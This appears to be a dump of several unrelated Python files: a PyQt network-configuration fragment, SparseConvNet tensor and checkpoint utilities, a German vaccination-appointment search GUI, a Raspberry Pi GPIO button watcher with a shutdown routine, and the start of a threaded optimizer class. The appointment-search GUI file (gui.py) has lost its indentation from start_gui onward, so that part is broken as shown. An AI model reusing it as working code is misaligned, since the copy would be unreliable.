                    workstation.update(simu_workstation)  # Add key actions to dictionary
            loaded_config[workstation["hostname"]] = workstation
            # Creating config pages with loaded data
            if "router" not in workstation["hostname"]:
                config = CommonWorkstation(workstation["hostname"], "workstation")
            else:
                config = RouterConfiguration(workstation["hostname"])
            self.active_configurations.append(config)
        self.update_networks_list()
        for config in self.active_configurations:
            if config.workstation_name in loaded_config.keys():
                config.set_configuration(loaded_config[config.workstation_name])
            self.multi_window.addTab(config, config.workstation_name)

    @pyqtSlot(int)
    def close_tab(self, tab_index):
        """ Close a workstation tab; tab 0 ("networks") cannot be closed """
        if tab_index >= 1:  # also excludes the "no tab" index -1
            self.multi_window.removeTab(tab_index)
            self.active_configurations.pop(tab_index - 1)

    @pyqtSlot()
    def check_parameters(self):
        """ Validate every workstation configuration and pop up a report """
        corrections = ""
        for workstation in self.active_configurations:
            corrections += "In workstation {}\n".format(workstation.workstation_name)
            workstation_status = workstation.check_values()
            for key, status in workstation_status.items():
                if not status:
                    corrections += "Parameter {} must be corrected\n".format(
                        key
                    )
        pop = PopUpWidget(corrections)
        pop.show()
|
utils.py | # Copyright 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import torch, glob, os, numpy as np, math
from .sparseConvNetTensor import SparseConvNetTensor
from .metadata import Metadata
def toLongTensor(dimension, x):
    """Coerce x into a LongTensor of length `dimension`.

    LongTensors pass through unchanged; lists/tuples must already have
    `dimension` entries; scalars are broadcast to all entries.
    """
    if hasattr(x, 'type') and x.type() == 'torch.LongTensor':
        return x
    if isinstance(x, (list, tuple)):
        assert len(x) == dimension
        return torch.LongTensor(x)
    return torch.LongTensor(dimension).fill_(x)
def optionalTensor(a, b):
    """Return attribute `b` of `a` if it exists, else an empty torch.Tensor."""
    if hasattr(a, b):
        return getattr(a, b)
    return torch.Tensor()
def optionalTensorReturn(a):
    """Map an empty tensor to None; pass non-empty tensors through unchanged."""
    return None if a.numel() == 0 else a
def threadDatasetIterator(d, num_threads=8, queue_size=16):
    """Return a factory of iterators yielding all items of dataset `d`.

    Items are produced by `num_threads` background worker threads through a
    bounded queue of `queue_size` entries, so item order is nondeterministic.
    Defaults match the previously hard-coded 8 threads / 16 slots.

    :param d: indexable dataset with len()
    :param num_threads: number of producer threads (generalized from fixed 8)
    :param queue_size: bounded queue capacity (generalized from fixed 16)
    :return: zero-argument callable producing a fresh iterator
    """
    try:
        import queue
    except BaseException:
        import Queue as queue  # Python 2 fallback
    import threading

    def iterator():
        def worker(i):
            # Each worker produces the strided slice d[i::num_threads].
            for k in range(i, len(d), num_threads):
                q.put(d[k])
        q = queue.Queue(queue_size)
        for i in range(num_threads):
            t = threading.Thread(target=worker, args=(i,))
            t.start()
        for _ in range(len(d)):
            item = q.get()
            yield item
            q.task_done()
        q.join()
    return iterator
def concatenate_feature_planes(input):
    """Concatenate the feature planes of several SparseConvNetTensors.

    All inputs are assumed to share the same metadata / spatial size
    (the first tensor's are reused) -- TODO confirm with callers.
    """
    first = input[0]
    output = SparseConvNetTensor()
    output.metadata = first.metadata
    output.spatial_size = first.spatial_size
    output.features = torch.cat([t.features for t in input], 1)
    return output
def add_feature_planes(input):
    """Element-wise sum of the feature planes of several SparseConvNetTensors.

    Metadata / spatial size are taken from the first input tensor.
    """
    first = input[0]
    output = SparseConvNetTensor()
    output.metadata = first.metadata
    output.spatial_size = first.spatial_size
    output.features = sum(t.features for t in input)
    return output
def append_tensors(tensors):
    """Merge SparseConvNetTensors into one batch: features are concatenated
    along dim 0 and each input's metadata is appended to fresh Metadata."""
    spatial_size = tensors[0].spatial_size
    dimension = len(spatial_size)
    merged = SparseConvNetTensor(
        features=torch.cat([t.features for t in tensors], 0),
        metadata=Metadata(dimension),
        spatial_size=spatial_size)
    for t in tensors:
        merged.metadata.appendMetadata(t.metadata, spatial_size)
    return merged
class AddCoords(torch.nn.Module):
    """Append normalized spatial coordinates (roughly in [-1, 1]) as extra
    feature planes of a SparseConvNetTensor; metadata/size pass through."""
    def forward(self, input):
        output = SparseConvNetTensor()
        if input.features.numel():
            with torch.no_grad():
                coords = input.get_spatial_locations()
                # half-extent per spatial axis, used to map coords into [-1, 1]
                d = (input.spatial_size.type_as(input.features)-1)/2
                # drop the trailing batch-index column before normalizing
                coords=coords[:,:-1].type_as(input.features)/ d[None,:] - 1
                # NOTE(review): this cat runs inside no_grad, so gradients do
                # not flow through the returned features -- confirm intended.
                output.features = torch.cat([input.features,coords],1)
        else:
            # empty input: nothing to augment
            output.features = input.features
        output.metadata = input.metadata
        output.spatial_size = input.spatial_size
        return output
def compare_sparse(x, y):
    """Mean squared difference between two SparseConvNetTensors.

    Sites active in both contribute (x-y)^2; sites active in only one
    tensor contribute that tensor's features squared (other side is zero).
    """
    cL, cR, L, R = x.metadata.compareSparseHelper(y.metadata, x.spatial_size)
    if x.features.is_cuda:
        cL, cR, L, R = cL.cuda(), cR.cuda(), L.cuda(), R.cuda()
    err = 0
    if cL.numel():
        err = err + (x.features[cL] - y.features[cR]).pow(2).sum()
    if L.numel():
        err = err + x.features[L].pow(2).sum()
    if R.numel():
        err = err + y.features[R].pow(2).sum()
    return err / (cL.numel() + L.numel() + R.numel())
def spectral_norm_svd(module):
    """Largest singular value of module.weight (3-d weights are flattened
    to 2-d over their last dimension first)."""
    weight = module.weight
    if weight.ndimension() == 3:
        weight = weight.view(-1, weight.size(2))
    singular_values = torch.svd(weight)[1]
    return singular_values[0]
def pad_with_batch_idx(x, idx):
    """Append a constant batch-index column to a coordinate tensor x."""
    batch_col = torch.LongTensor(x.size(0), 1).fill_(idx)
    return torch.cat([x, batch_col], 1)
def batch_location_tensors(location_tensors):
    """Concatenate per-sample location tensors into one, tagging every row
    with its sample's batch index. Empty tensors are skipped (note: raises
    if every input is empty, since torch.cat gets an empty list)."""
    tagged = [
        pad_with_batch_idx(lt, batch_idx)
        for batch_idx, lt in enumerate(location_tensors)
        if lt.numel()]
    return torch.cat(tagged, 0)
def prepare_BLInput(l, f):
    """Pack ragged per-sample location/feature tensors into dense batch tensors.

    Locations are right-padded with -1, features with zeros, up to the
    longest sample. Returns [L, F] with shapes (B, n_max, loc_dim) and
    (B, n_max, feat_dim).
    """
    with torch.no_grad():
        max_rows = max(x.size(0) for x in l)
        L = torch.empty(len(l), max_rows, l[0].size(1), dtype=torch.int64).fill_(-1)
        F = torch.zeros(len(l), max_rows, f[0].size(1))
        for i, (locs, feats) in enumerate(zip(l, f)):
            L[i, :locs.size(0), :].copy_(locs)
            F[i, :feats.size(0), :].copy_(feats)
        return [L, F]
def checkpoint_restore(model, exp_name, name2, use_cuda=True, epoch=0):
    """Restore model weights from '<exp_name>-<epoch:09d>-<name2>.pth'.

    With epoch > 0 that exact checkpoint must exist; with epoch == 0 the
    latest matching checkpoint (if any) is used. Returns the epoch to
    resume from (restored epoch + 1, or 1 when nothing was found).
    """
    if use_cuda:
        model.cpu()
    if epoch > 0:
        path = exp_name + '-%09d-' % epoch + name2 + '.pth'
        assert os.path.isfile(path)
        print('Restore from ' + path)
        model.load_state_dict(torch.load(path))
    else:
        candidates = sorted(glob.glob(exp_name + '-*-' + name2 + '.pth'))
        if candidates:
            path = candidates[-1]
            print('Restore from ' + path)
            model.load_state_dict(torch.load(path))
            # recover the epoch number embedded in the filename
            epoch = int(path[len(exp_name) + 1:-len(name2) - 5])
    if use_cuda:
        model.cuda()
    return epoch + 1
def is_power2(num):
    """True iff num is a positive power of two (1, 2, 4, ...)."""
    return num > 0 and num & (num - 1) == 0
def is_square(num):
    """True iff num is a perfect square (rounded integer square root check)."""
    root = int(num ** 0.5 + 0.5)
    return root * root == num
def has_only_one_nonzero_digit(num):  # https://oeis.org/A037124
    """True iff num has exactly one nonzero decimal digit (7, 500, 2000, ...).

    Uses an exact string-digit check instead of the previous
    num / 10**floor(log10(num)) float test, which loses precision for large
    integers and raised ValueError for negative inputs (now returns False).
    Non-integral values return False, integral floats (e.g. 200.0) work.
    """
    if num <= 0 or num != int(num):
        return False
    digits = str(int(num))
    return set(digits[1:]) <= {'0'}
def checkpoint_save(model, exp_name, name2, epoch, use_cuda=True):
    """Save model weights to '<exp_name>-<epoch:09d>-<name2>.pth'.

    The immediately preceding epoch's checkpoint is deleted to save disk
    space, unless that epoch is a power of two (kept as long-term snapshot).
    """
    path = exp_name + '-%09d-' % epoch + name2 + '.pth'
    model.cpu()  # always save CPU tensors
    torch.save(model.state_dict(), path)
    if use_cuda:
        model.cuda()
    previous_epoch = epoch - 1
    previous = exp_name + '-%09d-' % previous_epoch + name2 + '.pth'
    if os.path.isfile(previous) and not is_power2(previous_epoch):
        os.remove(previous)
def random_rotation(dimension=3, allow_mirror=False):
    """Random orthogonal matrix of size dimension x dimension.

    Draws an orthogonal basis via QR of a Gaussian matrix, then randomly
    flips column signs. Bugfix: the sign vector was hard-coded to shape
    (3,), which broke (shape-mismatch) for any dimension != 3.
    """
    r = torch.qr(torch.randn(dimension, dimension))[0]
    f = torch.randint(2, (dimension,))  # was torch.randint(2, (3,))
    if f.sum() % 2 == 0 and not allow_mirror:
        # Flip every sign bit to change the parity of the flips.
        # NOTE(review): 1-f only changes parity when `dimension` is odd,
        # and QR's Q itself may have det -1 -- confirm the mirror-avoidance
        # logic for even dimensions / general use.
        f = 1 - f
    return r * (2 * f - 1).float()
def squareroot_rotation(a):
    """Return rotation b with b @ b == a, via spherical interpolation (slerp)
    halfway between the identity and a.

    Rotation.from_dcm/as_dcm were renamed to from_matrix/as_matrix in
    scipy 1.4 and removed in 1.6 -- support both spellings.
    """
    import scipy.spatial.transform
    Rotation = scipy.spatial.transform.Rotation
    Slerp = scipy.spatial.transform.Slerp
    from_matrix = getattr(Rotation, 'from_matrix', None) or Rotation.from_dcm
    rotations = from_matrix(torch.stack([torch.eye(3), a]).numpy())
    halfway = Slerp([0, 1], rotations)([0.5])
    as_matrix = getattr(halfway, 'as_matrix', None) or halfway.as_dcm
    return torch.from_numpy(as_matrix()).float()[0]
def voxelize_pointcloud(xyz, rgb, average=True, accumulate=False):
    """Deduplicate point coordinates, combining colors of coincident points.

    average=True: per-voxel mean color; accumulate=True: per-voxel color sum;
    both False: keep the color of the first occurrence (np.unique order).

    Bugfix: the accumulate-only path previously returned the ORIGINAL
    full-length rgb tensor alongside the deduplicated xyz (first-dimension
    mismatch); it now returns the accumulated per-voxel colors.
    """
    if xyz.numel() == 0:
        return xyz, rgb
    if average or accumulate:
        xyz, inv, counts = np.unique(
            xyz.numpy(), axis=0, return_inverse=True, return_counts=True)
        xyz = torch.from_numpy(xyz)
        inv = torch.from_numpy(inv)
        rgb_out = torch.zeros(xyz.size(0), rgb.size(1), dtype=torch.float32)
        rgb_out.index_add_(0, inv, rgb)  # sum colors per unique coordinate
        if average:
            rgb_out = rgb_out / torch.from_numpy(counts[:, None]).float()
        return xyz, rgb_out
    else:
        # keep first-occurrence colors; use .numpy() consistently with above
        xyz, idxs = np.unique(xyz.numpy(), axis=0, return_index=True)
        xyz = torch.from_numpy(xyz)
        rgb = rgb[idxs]
        return xyz, rgb
class checkpointFunction(torch.autograd.Function):
    """Gradient checkpointing for SparseConvNet: forward runs run_function
    without building an autograd graph; backward recomputes it under
    enable_grad to obtain input-feature gradients, trading compute for
    activation memory."""
    @staticmethod
    def forward(ctx, run_function, x_features, x_metadata, x_spatial_size):
        # Stash everything needed to replay the forward pass in backward().
        ctx.run_function = run_function
        ctx.save_for_backward(x_features, x_spatial_size)
        # Metadata is not a tensor, so it cannot go through save_for_backward.
        ctx.x_metadata=x_metadata
        with torch.no_grad():
            # No graph is recorded here -- that is the memory saving.
            y = run_function(
                SparseConvNetTensor
                (x_features, x_metadata, x_spatial_size))
        return y.features
    @staticmethod
    def backward(ctx, grad_y_features):
        x_features, x_spatial_size = ctx.saved_tensors
        # Detach + require grad: recompute with a fresh leaf so .grad lands here.
        x_features = x_features.detach()
        x_features.requires_grad = True
        with torch.enable_grad():
            # Replay the forward pass, this time recording the graph.
            y = ctx.run_function(
                SparseConvNetTensor
                (x_features, ctx.x_metadata, x_spatial_size))
        torch.autograd.backward(y.features, grad_y_features,retain_graph=False)
        # Gradients only for x_features; run_function/metadata/spatial_size
        # are non-differentiable arguments.
        return None, x_features.grad, None, None
def checkpoint101(run_function, x, down=1):
    """Run run_function on x with gradient checkpointing (activations are
    recomputed during backward); output spatial size is divided by `down`."""
    features = checkpointFunction.apply(
        run_function, x.features, x.metadata, x.spatial_size)
    return SparseConvNetTensor(features, x.metadata, x.spatial_size // down)
def matplotlib_cubes(ax, positions, colors):
    """Draw a unit cube per row of `positions` on a matplotlib 3d axis.

    Usage:
        import matplotlib.pyplot as plt
        fig = plt.figure(figsize=(15,15))
        ax = fig.gca(projection='3d')
        matplotlib_cubes(ax, positions, colors)
        plt.show()
    """
    from mpl_toolkits.mplot3d import Axes3D
    from mpl_toolkits.mplot3d.art3d import Poly3DCollection
    try:
        positions = positions.numpy()
        colors = colors.numpy()
        # Six quad faces of a unit cube, centered on the origin.
        X = np.array([[[0, 1, 0], [0, 0, 0], [1, 0, 0], [1, 1, 0]],
                      [[0, 0, 0], [0, 0, 1], [1, 0, 1], [1, 0, 0]],
                      [[1, 0, 1], [1, 0, 0], [1, 1, 0], [1, 1, 1]],
                      [[0, 0, 1], [0, 0, 0], [0, 1, 0], [0, 1, 1]],
                      [[0, 1, 0], [0, 1, 1], [1, 1, 1], [1, 1, 0]],
                      [[0, 1, 1], [0, 0, 1], [1, 0, 1], [1, 1, 1]]]).astype(np.float32)[None]-0.5
        X = X + positions[:, None, None, :]
        X.resize(X.shape[0]*6, 4, 3)
        m = positions.min(0)
        M = positions.max(0)+1
        ax.set_xlim([m[0], M[0]])
        ax.set_ylim([m[1], M[1]])
        ax.set_zlim([m[2], M[2]])
        ax.add_collection3d(Poly3DCollection(X,
            facecolors=np.repeat(colors, 6, axis=0)))
    except Exception:
        # narrowed from bare except (which also caught KeyboardInterrupt);
        # plotting stays best-effort
        print('matplotlibcubes fail!?!')
    ax.set_axis_off()
def matplotlib_planes(ax, positions, colors):
    """Draw a unit x-facing quad per row of `positions` on a matplotlib 3d axis.

    Usage:
        import matplotlib.pyplot as plt
        fig = plt.figure(figsize=(15,15))
        ax = fig.gca(projection='3d')
        matplotlib_planes(ax, positions, colors)
        plt.show()
    """
    from mpl_toolkits.mplot3d import Axes3D
    from mpl_toolkits.mplot3d.art3d import Poly3DCollection
    try:
        positions = positions.numpy()
        colors = colors.numpy()
        # One quad per point, spanning the y/z unit square at x=0.
        X = np.array([[[0, -0.5, 0.5], [0, -0.5, -0.5], [0, 0.5, -0.5], [0, 0.5, 0.5]]]).astype(np.float32)[None]
        X = X + positions[:, None, None, :]
        X.resize(X.shape[0]*1, 4, 3)
        m = positions.min(0)
        M = positions.max(0)+1
        ax.set_xlim([m[0], M[0]])
        ax.set_ylim([m[1], M[1]])
        ax.set_zlim([m[2], M[2]])
        ax.add_collection3d(Poly3DCollection(X,
            facecolors=np.repeat(colors, 1, axis=0)))
    except Exception:
        # narrowed from bare except (which also caught KeyboardInterrupt);
        # plotting is deliberately best-effort and silent here
        pass
    ax.set_axis_off()
def visdom_scatter(vis, xyz, rgb, win='3d', markersize=3, title=''):
    """Scatter-plot a point cloud in visdom, colors rescaled to 0..255.

    Bugfix: detach() shares storage with the caller's tensor, so the
    in-place normalization below used to clobber the caller's rgb data;
    clone() makes the rescaling local.
    """
    rgb = rgb.detach().clone()
    rgb -= rgb.min()
    rgb /= rgb.max()/255+1e-10  # epsilon guards against all-equal colors
    rgb = rgb.floor().cpu().numpy()
    vis.scatter(
        xyz.detach().cpu().numpy(),
        opts={'markersize': markersize, 'markercolor': rgb, 'title': title},
        win=win)
def ply_scatter(name, xyz, rgb):
    """Write a point cloud to '<name>.ply' (ASCII), colors rescaled to 0..255.

    Bugfix: detach() shares storage with the caller's tensor, so the
    in-place normalization below used to clobber the caller's rgb data;
    clone() makes the rescaling local.
    """
    rgb = rgb.detach().clone()
    rgb -= rgb.min()
    rgb /= rgb.max()/255+1e-10  # epsilon guards against all-equal colors
    rgb = rgb.floor().cpu().numpy()
    with open(name+'.ply', 'w') as f:
        print("""ply
format ascii 1.0
element vertex %d
property float x
property float y
property float z
property uchar red
property uchar green
property uchar blue
end_header"""%(xyz.size(0)), file = f)
        for (x, y, z), (r, g, b) in zip(xyz, rgb):
            print('%d %d %d %d %d %d'%(x, y, z, r, g, b), file=f)
class VerboseIdentity(torch.nn.Module):
    """Identity layer that prints its input -- handy for debugging pipelines."""
    def forward(self, x):
        print(x)
        return x
|
gui.py | #!/usr/bin/env python3
import os
import json
import time
import threading
import multiprocessing
from PyQt5 import QtCore, QtWidgets, uic
from PyQt5.QtGui import QIcon
from tools.exceptions import ValidationError, MissingValuesError
from tools.gui import oeffne_file_dialog_select
from tools.gui.qtzeiten import QtZeiten
from tools.gui.qtkontakt import QtKontakt
from tools.gui.qtterminsuche import QtTerminsuche
from tools.utils import create_missing_dirs
from tools import kontaktdaten as kontak_tools
from tools import Modus
PATH = os.path.dirname(os.path.realpath(__file__))
class HauptGUI(QtWidgets.QMainWindow):
# Folgende Widgets stehen zur Verfügung:
### QLineEdit ###
# i_kontaktdaten_pfad
# i_zeitspanne_pfad
### Buttons ###
# b_termin_suchen
# b_code_generieren
# b_dateien_kontaktdaten
# b_dateien_zeitspanne
# b_neue_kontaktdaten
# b_neue_zeitspanne
### Layouts ###
# prozesse_layout
### QSpinBox ###
# i_interval
    def __init__(self, pfad_fenster_layout: str = os.path.join(PATH, "tools/gui/main.ui")):
        """
        Main window of the GUI application.

        Args:
            pfad_fenster_layout (str, optional): Loads the given window layout
                (created with Qt Designer - https://www.qt.io/download).
                Defaults to os.path.join(PATH, "tools/gui/main.ui").
        """
        super().__init__()
        create_missing_dirs(PATH)
        # Load the .ui file and apply adjustments
        uic.loadUi(pfad_fenster_layout, self)
        self.setWindowIcon(QIcon(os.path.join(PATH, "images/spritze.ico")))
        # Wire up the button callbacks
        self.b_termin_suchen.clicked.connect(self.__termin_suchen)
        self.b_code_generieren.clicked.connect(self.__code_generieren)
        self.b_dateien_kontaktdaten.clicked.connect(self.__update_kontaktdaten_pfad)
        self.b_dateien_zeitspanne.clicked.connect(self.__update_zeitspanne_pfad)
        self.b_neue_kontaktdaten.clicked.connect(lambda: self.kontaktdaten_erstellen(Modus.TERMIN_SUCHEN))
        self.b_neue_zeitspanne.clicked.connect(self.zeitspanne_erstellen)
        # Default file paths
        self.pfad_kontaktdaten: str = os.path.join(PATH, "data", "kontaktdaten.json")
        self.pfad_zeitspanne: str = os.path.join(PATH, "data", "zeitspanne.json")
        # Show the paths in the GUI
        self.i_kontaktdaten_pfad.setText(self.pfad_kontaktdaten)
        self.i_zeitspanne_pfad.setText(self.pfad_zeitspanne)
        # Holds all running termin_suchen processes
        self.such_prozesse = list(list())
        self.prozesse_counter = 0
        # Watchdog thread monitoring the search processes
        self.prozess_bewacher = threading.Thread(target=self.__check_status_der_prozesse, daemon=True)
        self.prozess_bewacher.start()
        # Show the GUI
        self.show()
        # Workaround so the window is hopefully brought to the foreground
        self.activateWindow()
@staticmethod
def start_gui():
"""
Startet die GUI Anwendung
"""
app = QtWidgets.QApplication(list())
app.setAttribute(QtCore.Qt.AA_X11InitThreads)
window = HauptGUI()
app.exec_()
def kontaktdaten_erstellen(self, modus: Modus = Modus.TERMIN_SUCHEN):
"""
Ruft den Dialog für die Kontaktdaten auf
Args:
modus (Modus): Abhängig vom Modus werden nicht alle Daten benötigt. Defalut TERMIN_SUCHEN
"""
dialog = QtKontakt(self, modus, self.pfad_kontaktdaten, PATH)
dialog.show()
dialog.exec_()
def zeitspanne_erstellen(self):
"""
Ruft den Dialog für die Zeitspanne auf
"""
dialog = QtZeiten(self, self.pfad_zeitspanne, PATH)
dialog.show()
dialog.exec_()
def __termin_suchen(self):
"""
Startet den Prozess der terminsuche mit Impfterminservice.terminsuche in einem neuen Thread
Dieser wird in self.such_threads hinzugefügt.
Alle Threads sind deamon Thread (Sofort töten sobald der Bot beendet wird)
"""
try:
kontaktdaten = self.__get_kontaktdaten(Modus.TERMIN_SUCHEN)
zeitspanne = self.__get_zeitspanne()
except FileNotFoundError as error:
QtWidgets.QMessageBox.critical(self, "Datei nicht gefunden!", f"Datei zum Laden konnte nicht gefunden werden\n\nBitte erstellen")
return
except ValidationError as error:
QtWidgets.QMessageBox.critical(self, "Daten Fehlerhaft!", f"In der angegebenen Datei sind Fehler:\n\n{error}")
return
except MissingValuesError as error:
QtWidgets.QMessageBox.critical(self, "Daten Fehlerhaft!", f"In der angegebenen Datei Fehlen Daten:\n\n{error}")
return
self.__start_terminsuche(kontaktdaten, zeitspanne)
def __start_terminsuche(self, kontaktdaten: dict, zeitspanne: dict):
"""
Startet die Terminsuche. Dies nur mit einem Thread starten, da die GUI sonst hängt
Args:
kontaktdaten (dict): kontakdaten aus kontaktdaten.json
zeitspanne (dict): zeitspanne aus zeitspanne.json
"""
check_delay = self.i_interval.value()
code = kontaktdaten["code"]
terminsuche_prozess = multiprocessing.Process(target=QtTerminsuche.start_suche, name=f"{code}-{self.prozesse_counter}", daemon=True, kwargs={
"kontaktdaten": kontaktdaten,
"zeitspanne": zeitspanne,
"ROOT_PATH": PATH,
"check_delay": check_delay})
try:
terminsuche_prozess.start()
if not terminsuche_prozess.is_alive():
raise RuntimeError(
f"Terminsuche wurde gestartet, lebt aber nicht mehr!\n\nTermin mit Code: {terminsuche_prozess.getName()}\nBitte Daten Prüfen!"
)
except Exception as error:
QtWidgets.QMessageBox.critical(self, "Fehler - Suche nicht gestartet!", str(error))
else:
# QtWidgets.QMessageBox.information(self, "Suche gestartet", "Terminsuche wurde gestartet!\nWeitere Infos in der Konsole")
self.such_prozesse.append(terminsuche_prozess)
self.__add_prozess_in_gui(terminsuche_prozess)
self.prozesse_counter += 1
def __code_generieren(self):
"""
Startet den Prozess der Codegenerierung
"""
# TODO: code generierung implementieren
QtWidgets.QMessageBox.information(self, "Noch nicht verfügbar", "Funktion nur über Konsolenanwendung verfügbar")
def __get_kontaktdaten(self, modus: Modus) -> dict:
"""
Ladet die Kontakdaten aus dem in der GUI hinterlegten Pfad
Args:
modus (Modus): Abhängig vom Modus werden nicht alle Daten benötigt.
Returns:
dict: Kontakdaten
"""
if not os.path.isfile(self.pfad_kontaktdaten):
self.kontaktdaten_erstellen(modus)
kontaktdaten = kontak_tools.get_kontaktdaten(self.pfad_kontaktdaten)
return kontaktdaten
def __get_zeitspanne(self) -> dict:
"""
Ladet die Zeitspanne aus dem in der GUI hinterlegtem Pfad
Returns:
dict: Zeitspanne
"""
if not os.path.isfile(self.pfad_zeitspanne):
self.zeitspanne_erstellen()
with open(self.pfad_zeitspanne, "r", encoding='utf-8') as f:
zeitspanne = json.load(f)
# TODO: Prüfen ob Daten vollständig
return zeitspanne
def __update_kontaktdaten_pfad(self):
"""
Holt sich mithilfe des QFileDialogs eine bereits vorhandene Datei.
Dieser Pfad wird in der GUI ersetzt und im Attribut der Kasse gespeichert
"""
try:
pfad = oeffne_file_dialog_select(self, "Kontakdaten", self.pfad_kontaktdaten)
self.pfad_kontaktdaten = pfad
self.i_kontaktdaten_pfad.setText(self.pfad_kontaktdaten)
except FileNotFoundError:
pass
def __update_zeitspanne_pfad(self):
"""
Holt sich mithilfe des QFileDialogs eine bereits vorhandene Datei.
Dieser Pfad wird in der GUI ersetzt und im Attribut der Kasse gespeichert
"""
try:
pfad = oeffne_file_dialog_select(self, "Zeitspanne", self.pfad_zeitspanne)
self.pfad_zeitspanne = pfad
self.i_zeitspanne_pfad.setText(self.pfad_zeitspanne)
except FileNotFoundError:
pass
def __add_prozess_in_gui(self, prozess: multiprocessing.Process):
"""
Die Prozesse werden in der GUI in dem prozesse_layout angezeigt
"""
# addRow(label, field)
label = QtWidgets.QLabel(f"Prozess: {prozess.name}")
button = QtWidgets.QPushButton("Stoppen")
button.setObjectName(prozess.name)
button.clicked.connect(lambda: self.__stop_prozess(prozess))
self.prozesse_layout.addRow(label, button)
def __stop_prozess(self, prozess: multiprocessing.Process):
"""
Stopped den übergebenen Prozess und löscht diesen aus der GUI
Args:
prozess (multiprocessing.Process): Prozess welcher getötet werden soll
"""
prozess.kill()
self.such_prozesse.remove(prozess)
self.__remove_prozess_von_gui(prozess)
def __remove_prozess_von_gui(self, prozess: multiprocessing.Process):
"""
Entfernt die Anzeige des Prozesses aus der GUI
Args:
prozess (multiprocessing.Process): Prozess welcher entfernt werden soll
warnung (bool, optional): Warnung an den User ausgeben, dass der Prozess weg ist. Defaults to False.
"""
button = self.findChild(QtWidgets.QPushButton, prozess.name)
self.prozesse_layout.removeRow(button)
def __check_status_der_prozesse(self):
"""
Wird von einem Thread dauerhaft durchlaufen um zu prüfen ob ein Prozess sich beendet hat
"""
while True:
for prozess in self.such_prozesse:
if not prozess.is_alive():
self.__remove_prozess_von_gui(prozess)
self.such_prozesse.remove(prozess)
time.sleep(2)
def main():
    """Entry point: enable frozen-executable multiprocessing support, then
    launch the GUI application."""
    multiprocessing.freeze_support()
    HauptGUI.start_gui()


if __name__ == "__main__":
    main()
|
physical_input.py | from threading import Thread
import os
import time
from time import sleep
import RPi.GPIO as GPIO
# Must run before any GPIO.setup() call (see Pins.__init__ below).
GPIO.setmode(GPIO.BOARD) # use board pin number (consecutive) instead of GPIO numbers.
def safe_shutdown():
    """Gracefully stop any running GST recordings, then power the system off.

    Sends SIGINT to gst-launch-1.0 (which triggers End-of-Stream on videos
    currently being recorded), waits 3 seconds, and shuts the machine down.
    """
    pre_shutdown_cmds = (
        # SIGINT triggers End of Stream on currently recording videos.
        "pkill -e --signal SIGINT gst-launch-1.0",
        "echo GST streams ended",
    )
    for cmd in pre_shutdown_cmds:
        os.system(cmd)
    print("Pre-shutdown commands have run. Shutting down in 3 seconds.")
    time.sleep(3)
    os.system("shutdown -h now")
class Pins:
    '''
    Interface for watching GPIO binary inputs within another script.

    Usage: create a Pins object, register a function that should run whenever
    an input reads True, then call start().
    Choose among: 'black_button', 'hind_switch', 'front_toggle', 'rear_toggle'

        def safe_shutdown():
            ...

        pins = Pins()
        pins.setup_function('black_button', safe_shutdown)
        pins.start()

    If the function takes arguments, pass them as a tuple/list as the third
    argument of setup_function().

    If the calling script is looped and you want the boolean values at each
    loop, read them from the `bool` dictionary:

        while True:
            ... something ...
            is_toggle_pin_true = pins.bool['front_toggle']
            ... do something with boolean switch value ...
    '''

    def __init__(self,
                 black_button_pin=7,
                 hind_switch_pin=15,
                 front_toggle_pin=29,
                 rear_toggle_pin=31,
                 ):
        """Configure the four inputs; pin numbers are physical BOARD numbers."""
        # Physical (BOARD) pin per input name.
        self.pins = {
            'black_button': black_button_pin,
            'hind_switch': hind_switch_pin,
            'front_toggle': front_toggle_pin,
            'rear_toggle': rear_toggle_pin,
        }
        # Last sampled (flip-corrected) boolean per input.
        self.bool = {
            'black_button': False,
            'hind_switch': False,
            'front_toggle': False,
            'rear_toggle': False,
        }
        # Callback to run while an input reads True (None = no callback).
        self.fns = {
            'black_button': None,
            'hind_switch': None,
            'front_toggle': None,
            'rear_toggle': None,
        }
        # Positional arguments for each callback (None = call with no args).
        self.fn_args = {
            'black_button': None,
            'hind_switch': None,
            'front_toggle': None,
            'rear_toggle': None,
        }
        # Invert the raw reading for switches installed the wrong way round.
        self.flip_true = {
            'black_button': False,
            'hind_switch': False,
            'front_toggle': False,
            'rear_toggle': False,
        }
        for button in self.pins:
            GPIO.setup(self.pins[button], GPIO.IN)

    def setup_function(self, pin_desc, function, function_args=None, flip_true=False):
        '''
        Register a function to run whenever the pin reads True.

        Args:
            pin_desc (string): pin description, one of the keys of self.pins
                ('black_button', 'hind_switch', 'front_toggle', 'rear_toggle')
            function (function): python function
            function_args (tuple/list): positional arguments for the function
            flip_true (boolean): in case the switch has been installed the
                wrong way, flip the booleans so that 'function' runs on a
                'False' raw input.
        '''
        self.fns[pin_desc] = function
        if function_args is not None:
            if not isinstance(function_args, list):
                function_args = list(function_args)
            self.fn_args[pin_desc] = function_args
        self.flip_true[pin_desc] = flip_true

    def start(self):
        """Start a background thread that polls all pins every 0.1 s."""
        def pin_loop():
            while True:
                sleep(0.1)
                try:
                    for key in self.pins:
                        function_args = self.fn_args[key]
                        function = self.fns[key]
                        flip_true = self.flip_true[key]
                        activation = GPIO.input(self.pins[key])
                        # genuine boolean is XOR of flip_true and activation
                        self.bool[key] = bool(activation) != bool(flip_true)
                        if self.bool[key] and function is not None:
                            if function_args is not None:
                                function(*function_args)
                            else:
                                function()
                except KeyboardInterrupt:
                    # Fix: the original iterated `self.bool[key]`, which is a
                    # plain bool and not iterable (TypeError). Clean up every
                    # configured pin instead.
                    for source in self.pins:
                        GPIO.cleanup(self.pins[source])

        p = Thread(target=pin_loop, args=())
        p.start()
if __name__ == "__main__":
    # Demo: print a message while the black button is held, and dump all
    # input states every 0.1 s.
    def demo_print(text, text2):
        print(f"WOAHH this is something you wrote: {text}. Also, {text2}")

    pins = Pins()
    # Fix: the callback was registered under 'red_button', which is not one
    # of the configured inputs (see Pins.pins) - the polling loop only
    # iterates configured pins, so the demo callback could never fire.
    pins.setup_function('black_button', demo_print, ('Mr. and Mrs. Bob Vance', 'I send it back'))
    pins.start()
    while True:
        sleep(0.1)
        for button in pins.bool:
            print(button, ': ', pins.bool[button])
|
thread.py | from threading import Event, Thread
from febo.algorithms import Algorithm
import sys
class ThreadAlgorithm(Algorithm):
    """
    This algorithms runs a minimize route in a separate thread. Using this base class,
    one can easily adapt existing `minimize` (like scipy's optimize.minimize), which
    by default don't allow manual 'stepping' through the optimization via next() and
    add_data(x,y).
    """

    def initialize(self, **kwargs):
